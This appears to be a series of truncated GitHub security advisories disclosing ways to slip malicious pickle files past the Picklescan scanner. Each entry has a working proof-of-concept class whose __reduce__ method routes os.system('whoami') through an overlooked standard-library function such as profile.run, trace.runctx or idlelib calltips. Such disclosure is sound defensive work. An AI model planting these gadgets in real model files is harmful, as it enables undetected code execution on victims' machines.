Source
ghsa
### Summary Using idlelib.calltip.Calltip.fetch_tip, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to idlelib.calltip.Calltip.fetch_tip function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` class EvilCalltipFetchTip: def __reduce__(self): from idlelib.calltip import Calltip # fetch_tip(expression) -> get_entity(expression) -> eval(expression) return Calltip().fetch_tip, ("__import__('os').system('whoami')",) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed mal...
### Summary Using code.InteractiveInterpreter.runcode, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to code.InteractiveInterpreter.runcode function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` class EvilCodeRuncode: def __reduce__(self): from code import InteractiveInterpreter # InteractiveInterpreter().runcode(cmd) -> exec(cmd) return InteractiveInterpreter().runcode, ("__import__('os').system('whoami')",) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed mal...
### Summary Using idlelib.autocomplete.AutoComplete.fetch_completions, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to idlelib.autocomplete.AutoComplete.fetch_completions function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` class EvilIdlelibAutocompleteFetchCompletions: def __reduce__(self): from idlelib.autocomplete import AutoComplete, ATTRS return AutoComplete().fetch_completions, ("__import__('os').system('whoami')", ATTRS) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers...
### Summary Using idlelib.autocomplete.AutoComplete.get_entity, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to idlelib.autocomplete.AutoComplete.get_entity function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` class EvilIdlelibAutocompleteGetEntity: def __reduce__(self): from idlelib.autocomplete import AutoComplete return AutoComplete().get_entity, ("__import__('os').system('whoami')",) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file ...
### Summary Using idlelib.debugobj.ObjectTreeItem.SetText, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to idlelib.debugobj.ObjectTreeItem.SetText function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` class EvilDebugobjSetText: def __reduce__(self): from idlelib.debugobj import ObjectTreeItem # ObjectTreeItem(..., setfunction=print).SetText(cmd) return ObjectTreeItem("label", None, print).SetText, ("__import__('os').system('whoami')",) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the im...
### Summary Using lib2to3.pgen2.grammar.Grammar.loads, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to lib2to3.pgen2.grammar.Grammar.loads function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` class Evil: def __reduce__(self): import os return (os.system, ('whoami',)) class EvilLib2to3Pgen2GrammarLoads: def __reduce__(self): from lib2to3.pgen2.grammar import Grammar payload = pickle.dumps(Evil()) # payload = b'\x80\x04\x95!\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x06whoami\x94\x85\x94R\x94.' return Grammar().loads, (payload,) `...
### Summary Using profile.Profile.runctx, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to profile.Profile.runctx function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` class EvilProfileRunctx: def __reduce__(self): from profile import Profile payload = "__import__('os').system('whoami')" return Profile.runctx, (Profile(), payload, {}, {}) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when th...
### Summary Using profile.Profile.run, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to profile.Profile.run function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` class EvilProfileRun: def __reduce__(self): from profile import Profile payload = "__import__('os').system('whoami')" return Profile.run, (Profile(), payload) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loa...
### Summary Using trace.Trace.runctx, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to trace.Trace.runctx function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` class EvilTraceRunctx: def __reduce__(self): from trace import Trace payload = "__import__('os').system('whoami')" return Trace.runctx, (Trace(), payload, {}, {}) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is l...
### Summary Using trace.Trace.run, which is a built-in python library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to trace.Trace.run function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` class EvilTraceRun: def __reduce__(self): from trace import Trace payload = "__import__('os').system('whoami')" return Trace.run, (Trace(), payload) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded. Supply Chain ...